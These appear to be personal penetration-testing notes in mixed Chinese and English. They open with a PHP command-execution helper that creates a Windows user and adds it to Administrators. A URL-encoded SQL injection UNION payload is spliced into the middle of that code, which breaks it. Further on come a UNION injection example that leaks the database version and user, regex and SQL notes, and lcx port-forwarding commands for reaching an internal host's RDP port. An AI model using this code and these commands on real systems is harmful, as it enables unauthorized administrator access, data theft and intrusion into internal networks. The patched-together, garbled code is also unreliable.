php // add user???
function Exec_Run($cmd)
{
$res = '';
if (function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);}
elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}
elseif(function_exists('system')){@ob_start();@system($cmd);$res=@ob_get_contents();@ob_end_clean();}
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res=@ob_get_contents();@ob_end_clean();}
elseif(@is_resource($f = @popen($cmd,"r"))){$res = '';while(!@feof($f)){$res.=@fread($f,1024);}@pclose($f);}
return $res;
}
function Shell_Up($user,$pass,$group = "user"){
$res = Exec_Run("net user ".$user." ".$pass." /active:yes /add");
echo "first result".$res."
";
$res = Exec_Run("net localgroup ".$group." ".$user." /del");
echo "second result".$res."
";oN%20SeLect%201,2,3,ConCat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25e0FrOm%20Information_schema./_/Tables--%20-
$res = Exec_Run("net localgroup ".$group." ".$user." /add");
echo "thrid result".$res."
";
}
Shell_Up("test","test123","Administrators");
sql load
1、from子句组装来自不同数据源的数据;
2、where子句基于指定的条件对记录行进行筛选;
3、group by子句将数据划分为多个分组;
4、使用聚集函数进行计算;
5、使用having子句筛选分组;
6、计算所有的表达式;
7、使用order by对结果集进行排序。
sql http://www.cnblogs.com/laodao1/archive/2010/01/07/1641259.html
mysql 通配符 http://blog.csdn.net/win7system/article/details/53508401
group by a,b // 先对a分组,再对b分组 http://uule.iteye.com/blog/1569262
union select 必须列数相同
table content
id | name | time | word
1 | aaa | 2017 | hello
2 | bbb | 2017 | world
select * from content union select 1,version(),3,user()
1 | aaa | 2017 | hello
2 | bbb | 2017 | world
1 | 5.6.2| 3 | root@localhost
sql hack https://www.cnblogs.com/zlgxzswjy/p/6707433.html
sql join on left join right join 左连接,右连接 https://www.cnblogs.com/BeginMan/p/3754322.html
*? 重复任意次,但尽可能少重复
+? 重复1次或更多次,但尽可能少重复
?? 重复0次或1次,但尽可能少重复
{n,m}? 重复n到m次,但尽可能少重复
{n,}? 重复n次以上,但尽可能少重复
http://blog.csdn.net/sufubo/article/details/50990684 ^匹配问题 在[]里面表示否定,其他表示匹配开始
如 [^a-z] 表示除a-z的任意字符
如 (^a)dad 表示匹配以adad开头的字符
python yield 中断 https://www.ibm.com/developerworks/cn/opensource/os-cn-python-yield/
渗透内网 首先要内网走出来,得到一条从内网到外网的路径 //内网---->外网,从而外网逆向路径可以访问内网 //axx---从这条路走那条路是走得通的,但是我们不希望他从那条路访问得到我们
lcx 端口转发 lcx -slave 1.1.1.1 9999 127.0.0.1 3389
lcx.exe -listen 9999 3389
远程连接本地的127.0.0.1
https://www.cnblogs.com/hiccup/p/4421114.html lcx 分析
http://blog.csdn.net/wodafa/article/details/59058004 //pedoll ???